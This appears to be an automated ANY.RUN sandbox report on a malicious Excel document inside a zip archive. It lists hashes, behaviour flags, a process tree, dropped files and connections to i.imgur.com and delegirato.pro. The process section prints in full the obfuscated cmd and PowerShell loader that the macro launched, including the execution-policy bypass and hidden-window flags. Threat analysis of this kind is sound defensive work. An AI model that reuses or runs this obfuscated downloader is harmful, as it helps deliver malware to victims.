analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

100998860826-107-0_attach.1.20190212.DOC60807.xls.zip

Full analysis: https://app.any.run/tasks/a70ba5ba-c6e7-4ad5-838d-d860a10b3464
Verdict: Malicious activity
Analysis date: February 18, 2019, 15:18:31
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
maldoc-5
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

D991787AEC896290C4A989871F90A963

SHA1:

A555FA6F7FF70570BE4E0316CBAE3D121A84E2B0

SHA256:

EDD90A7A56A2ECA02C43B2589FA13B4B83104C9C38D603FEBA2D1D21B1CA2E98

SSDEEP:

1536:XwEhYLZ807XIRQkLeH0FtZqBDyou3qCjVvYs3k3gH8MKFS9ZGSA:XwEhi807YRQHAt8BxkDZwSkZU98SA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2312)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2312)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2612)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmD.exe (PID: 3276)
    • Creates files in the user directory

      • powershell.exe (PID: 2624)
  • INFO

    • Creates files in the user directory

      • EXCEL.EXE (PID: 3512)
      • EXCEL.EXE (PID: 2312)
      • EXCEL.EXE (PID: 2852)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2852)
      • EXCEL.EXE (PID: 2312)
      • EXCEL.EXE (PID: 3512)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:02:18 16:16:06
ZipCRC: 0x30f7d527
ZipCompressedSize: 57329
ZipUncompressedSize: 88582
ZipFileName: 100998860826-107-0_attach.1.20190212.DOC60807.xls.tmp
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
10
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winrar.exe no specs excel.exe no specs excel.exe no specs rundll32.exe no specs mctadmin.exe no specs excel.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2976"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\100998860826-107-0_attach.1.20190212.DOC60807.xls.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3512"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2852"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2848"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL intl.cplC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3276C:\Windows\system32\mctadmin.exeC:\Windows\system32\mctadmin.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MCTAdmin
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2312"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3276cmD /C "sEt eIw=${d`EMo}='4 , 521,321,94 ,521,43 ,54,201, 93, 93 ,511,93 ,93 ,93,16,521 ,99,411 ,321 ,63(]][RAhC[, '''' ("nIo`j"::]GnIRTs[()''''nIOJ-''x''+]3,1[)("gni`R`tSoT".}ECNerE`F`ErPEsoB`rEV{$ ( . 83,04, 43 ,321, 84 , 521,43,54 ,201, 23 , 93, 93 ,101,401 ,93,93, 44 ,801,93,93,14 , 23 , 04,43 ,321 , 94 , 521,321 , 84 , 521 , 43 , 23,54 , 201, 93 ,93 , 99 ,611 ,93,93 , 44 , 93, 93,79,8 , 121 , 211 ,101, 93 , 93 ,44, 93 ,93 ,601 ,101,93,93 ,44 , 93,93 ,411 , 93, 93,14, 23,04 , 43 , 321, 05 , 521 ,321,94,521 ,321 ,84 , 521, 43 , 23 ,54,201 , 93, 93 ,54,489,93,93 ,14, 95 , 64, 04 , 43 ,321, 94 , 521 , 321 ,05, 521, 321,87, 101,911 ,54, 97,86 ,93,93 ,44 ,93 , 93 , 56, 001,93,93,44 , 93,93 ,84, 521, 321,94,521 , 43,23 , 54 ,201, 93 ,93 ,64, 87, 79 ,901 , 101 , 23, 04, 43, 321,05 , 521, 321, 801 ,121,89 , 86,93,93,44,93, 93 , 411 ,79 , 911 ,501 ,011, 301 ,93 , 93 , 44 , 93, 93,001 ,93 , 93 , 14 ,23,54,56 ,511 ,511, 101, 901,84 , 521 ,321 ,45, 521,43 ,54, 201 ,23 , 93 , 93 , 8 ,521 , 16 , 04,04 , 43, 321 , 05, 521 , 321,25 ,521,321 ,94, 521, 321, 15,521, 321,35,521,321 ,8,69 , 38 ,121 ,511 ,611,101,901,93 , 93 , 14 ,95 ,63,321 , 485,93 ,93 ,44 ,93, 93 ,711,411 ,64 , 99, 111, 901 , 74,93,93 ,44 , 93 , 93,401,611,611 , 211 , 511, 93,93 , 44,93, 93, 74,74 ,501,64,501 ,901,301, 93 ,93, 44,93 ,93, 38 , 93 ,93 , 44, 93, 93 ,8 ,511, 984, 98 , 76,84,521,321,45, 521, 321,65 ,521 ,43 , 23 ,54, 201,23 , 93, 93 ,311,67 ,93, 93 ,44,93,93 , 64, 211 ,011, 301,93, 93,14, 44 , 93 , 93, 74,74,74,289 , 74 ,25, 94 , 93 ,93 , 44,04,43 , 321 ,15 ,521, 321 , 35 ,521, 321 ,55, 521, 321,05 , 521 , 321 , 94 , 521, 321,25 ,521,321 ,85, 74 ,74, 501 , 901, 79, 301, 101,511 , 93, 93, 44,93 ,93 ,111, 021 ,64 ,99 , 111,901 , 93,93 , 44, 93, 93 ,74 ,74 , 74, 79 , 8 ,35 ,59,111 ,64, 211,011 ,93,93, 44 ,93 , 93 ,05,64 , 93,93 , 44 ,93 , 93 ,74,74 , 74 , 93 , 93,44 , 93 ,93 , 401, 611 ,611, 211, 511 , 89, 93, 93 , 44 ,93 , 93,65,05,021 ,15, 386 ,93 ,93 ,44 , 93 , 93 ,501,901,301, 84 , 521,43 ,54 ,201 ,23 ,93 ,93, 96 ,56 , 8 , 27, 97, 001, 43 , 23, 16 ,23 ,04, 43 , 321,94,521 ,321, 87 ,521 , 64,43 , 901 ,96 , 69 , 4801 ,521, 14,95, 63 , 321, 77, 8 , 8, 101, 43 ,04,63 , 321, 711 ,69, 28,69, 96 , 79 ,485, 43, 76, 285 ,8 , 101, 311,711 , 101 , 511, 611,39 , 89 ,28 ,101 , 87,101 ,611 , 64 , 78, 121,511, 611,101 , 901 ,64 , 8 ,521 , 14, 321 ,63,321,77, 011, 521,23 , 16,23 , 19 ,3801 ,521,23 ,501 ,011,23 ,63 , 321 ,611 ,38, 84,521,321 , 94 ,521, 43 ,23,54 , 201 , 93 ,93, 411 ,101 , 93 , 93, 44 ,93 , 93 ,301 , 93 , 93,14, 14, 95,201, 111 , 411,101 , 79 ,99,401, 04 ,63 ,321,711 ,69 ,28, 521, 16, 64,04,43 ,321, 86 , 69, 58,401 , 43 , 95, 23 , 501,201 ,23, 04,63 , 321 , 97,69 , 501 ,521 , 23 ,54 , 301 , 101 ,23, 25,25 , 25,25 ,14 ,321, 63 ,321,87,69, 17 , 69 , 4801 ,101,69,8,87,487 , 611 ,96, 87, 511 ,96, 43 ,04 , 14 ,95 , 63,321 ,111 , 69, 37 , 521,16, 63 , 321 ,111, 111,521 , 64, 43 ,76,111, 69,8, 211, 111, 69, 8 ,101 , 38,69,287 , 521,64 ,43 , 17, 69, 96, 486, 411 , 79 ,911,501 , 93 , 93,44 ,93, 93, 27 ,93 , 93,14, 95, 63 , 321, 97,97 ,521,23,16, 23 , 63 , 321 , 901 ,84,521, 321, 05, 521 , 321,25 ,521 ,43 ,23 , 54 ,201 , 93 ,93 ,64,8,121 , 511, 93,93 , 44 ,93, 93, 011,93, 93 , 44 ,93,93,611,101 ,901 ,93 , 93 ,44 ,93, 93 , 401,93, 93, 14 ,23, 04,43 ,321,15,521,321,94, 521 ,321,84 ,521 , 43 , 23 , 54, 201, 93 ,93 , 101 , 401, 93 ,93,44,93 ,93 ,383,04,43, 321,94 ,521 ,321, 87 ,101,611,93,93 ,44 ,93 , 93 , 301,64 , 66 , 501, 611,901 , 79, 211,93 ,93, 14 ,04 ,04, 84 ,521, 321 ,94 ,521, 321 ,05 ,521, 43,23, 54 , 201,93, 93,8, 101, 93,93,44,93,93 ,411 , 93,93 ,14 ,23, 04,43 , 321 ,84 , 521, 43,23 , 54, 201,23, 93,93, 401 , 93, 93, 44, 93,93 , 64, 783 , 04 ,43 ,321, 94 ,521 , 321, 801 ,521, 14 ,14 , 95 ,63 ,321 , 101 ,521,16 ,8, 86 ,43 ,04,63, 321,711, 69, 28,69, 96 , 011 , 411 ,69, 101, 56,801 , 501 , 101, 011,611, 93,93, 14,14 , 64 , 43 , 97, 089,76,84 , 521, 321, 94 ,521, 321, 05 ,521,43, 54,201, 23, 93 , 93, 66,121, 611 , 101,93, 93 , 44 ,93 , 93, 8 , 69, 501 ,521,44, 93 ,93,19 ,93, 93 , 44 , 93,93 ,411,101 ,93 , 93 , 14, 23 , 04,43 , 321 ,801 ,43 ,04 ,63, 321 , 18 , 69 , 501 ,021, 69 , 101,8 ,521,64,43,301,96 , 611 , 086 , 69,58,521 ,16,63 , 321 ,8,69 ,484, 64 ,64 ,05 ,94 , 75, 14, 14,321, 63 ,321,984, 64 , 64 , 05, 25,14 , 421, 64, 04,93 ,93 , 73 ,93 ,93 , 14, 321 ,201,111, 411, 101 , 79 , 99,401 ,04,63 , 321 ,311,69,37 , 521 , 23,501,011, 04, 84,95,04 ,84 , 84 ,521 ,321 ,94 ,521 ,43, 54, 201 , 93 ,93 , 37,93,93,44,93 , 93 ,39 ,93,93,14 , 23 ,35, 35,83, 04 ,43,321 ,89 , 79 ,011, 001, 23, 94,35, 14 , 14 , 521 , 521 , 95 ,8,521,64 ,43, 301 ,43 ,23,54,89,111 , 411 , 04,63,321 , 121,489,79 , 011, 001,94 ,35 ,14 , 24, 94 , 45, 14 ,54, 8 , 521, 64,43 ,66,43 , 54 , 8,43 , 04, 04,63 ,321,121,69,485 , 43 , 07,67 ,69 , 97,111,285, 84 ,34, 63,321 ,311 ,501 ,521, 39 ,16,04 , 19, 901, 79 ,611 ,401,39,89 , 411 ,101 ,79 ,701 , 521 ,521, 44 ,63 ,321 , 59 , 521, 14 ,95, 63 ,321,96 ,521, 19 , 63 ,321 ,59 ,521, 24 , 05,05 , 84 , 64 ,64 , 35 ,15 , 94 , 45, 39 ,14,14,95,87 ,301,43 ,04 , 63,321,96,521,19 , 8, 37 , 69 , 8, 28,511,48 , 76,69 , 501, 501, 43 ,64 , 43 , 301 , 69, 101 ,485, 43 , 79, 385 ,8 ,101 , 021 , 611 , 64 ,96 , 011 , 99, 111,001 , 501 ,011 ,301 , 39,8 , 121,511 , 611, 101 , 901 ,64 ,48 ,93,93,14, 04, 19 ,38801 ,211, 511, 54,23, 93,93 ,93, 96 , 8,97 ,76,43 , 64 , 521 ,99 ,411,321, 63, 04, 54,64, 64 , 94, 54, 19 ,521, 76, 411 , 321, 63 ,23 , 16, 23, 521 ,201,07 , 69, 96,321 ,63 ,95, 43,44 , 43 ,23 , 611, 501 , 87 , 69,58,801 ,43, 64 , 521,07,07,69, 101, 321, 63 , 04, 54,64,64,94, 54,19,521,07 , 07 ,69 ,101 , 321,63,16, 521,111, 67 ,321 , 63 , 95,43 ,44 , 43, 23 ,011 ,501 , 111 , 601 , 54 ,23 , 39 , 14,43 ,487 ,101 ,83 , 95 , 43 , 43 ,23, 011 ,501 , 111 , 601, 54,23 ,39 , 14,43, 27, 611 , 301 , 69 ,84,321,43 , 04, 801 , 321 ,63 , 04, 14 ,93 , 021 , 93 ,44,93 , 101, 501 ,93 ,23 ,201 ,54,23 ,43,521,94 ,321 ,521, 8 ) ) )14 ,521 , 97 ,' -split "8";${de} = ${d`EmO}[-1..-(${d`emO}."CoU`NT")] -join "8";${dD}=${De}[-1..-(${D`e}."L`En`GtH")] -join "";^&("{1}{0}"-f 'x','ie')(${d`D})&&SeT tRsY=pOwERSHELl -ExecUTIONPOLiC BYpaSs -nOni -NOPRoFiLe -WiN hIdden . ( \"{1}{0}\"-f 't','se') dCz2Y ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' ) ) ; ( $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p' ) ) )^^^| ^^^&( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') ( \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn'' )&& cmD/C %trSY%"C:\Windows\system32\cmD.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2612cmD /C %trSY%C:\Windows\system32\cmd.execmD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2624pOwERSHELl -ExecUTIONPOLiC BYpaSs -nOni -NOPRoFiLe -WiN hIdden . ( \"{1}{0}\"-f 't','se') dCz2Y ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' ) ) ; ( $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p' ) ) )| &( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') ( \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn'' )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3632"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 844
Read events
2 210
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
8
Unknown types
5

Dropped files

PID
Process
Filename
Type
3512EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6AA0.tmp.cvr
MD5:
SHA256:
3512EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFEBD37C007A0762B1.TMP
MD5:
SHA256:
3512EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF725415BC979B92AA.TMP
MD5:
SHA256:
2852EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA66C.tmp.cvr
MD5:
SHA256:
2852EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF7BB3F022EB7BB100.TMP
MD5:
SHA256:
2852EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF5BD562378ACDEDAD.TMP
MD5:
SHA256:
2312EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6D17.tmp.cvr
MD5:
SHA256:
2624powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JLYO6YZWX0U1R8OF9A2J.temp
MD5:
SHA256:
2312EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF58CF900576391DBE.TMP
MD5:
SHA256:
2312EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF703E8726109A5084.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2624
powershell.exe
151.101.120.193:443
i.imgur.com
Fastly
US
malicious
2624
powershell.exe
194.76.225.64:443
delegirato.pro
suspicious

DNS requests

Domain
IP
Reputation
i.imgur.com
  • 151.101.120.193
shared
delegirato.pro
  • 194.76.225.64
malicious

Threats

No threats detected
No debug info